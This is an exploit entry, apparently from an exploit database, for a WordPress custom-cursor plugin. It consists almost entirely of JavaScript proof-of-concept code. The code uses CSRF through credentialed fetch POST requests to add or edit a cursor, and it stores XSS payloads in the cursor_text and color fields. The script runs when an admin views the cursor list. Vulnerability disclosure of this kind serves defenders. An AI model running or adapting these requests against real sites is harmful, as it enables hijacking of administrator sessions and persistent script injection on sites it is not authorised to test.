## https://sploitus.com/exploit?id=WPEX-ID:4C13A93D-2100-4721-8937-A1205378655F
Make a logged in admin open a page with the below JS code in it
// To add a cursor with XSS payloads in it:
fetch("https://example.com/wp-admin/admin.php?page=wpcc_add_new", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'cursor_shape=1&cursor_type=text&cursor_image=&click_point=50%2C50&cursor_text=<script>alert(/XSS-text/)>&color=<script>alert(/XSS-color/)>&width=30&blending_mode=normal&hide_tablet=on&hide_mobile=on&hover_cursor_type=1&hover_cursors=&activate_on=0&selector_type=tag&selector_data=&submit=Save+Cursor',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
// To edit the cursor with ID 1 and set XSS payloads in it:
fetch("https://example.com/wp-admin/admin.php?page=wpcc_add_new&edit_row=1", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'cursor_shape=1&cursor_type=text&cursor_image=&click_point=50%2C50&cursor_text=<script>alert(/XSS-text/)>&color=<script>alert(/XSS-color/)>&width=30&blending_mode=normal&hide_tablet=on&hide_mobile=on&hover_cursor_type=1&hover_cursors=&activate_on=0&selector_type=tag&selector_data=&update_id=1&update=Update+Cursor',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
The XSS will be triggered when viewing the cursor list as well as when editing it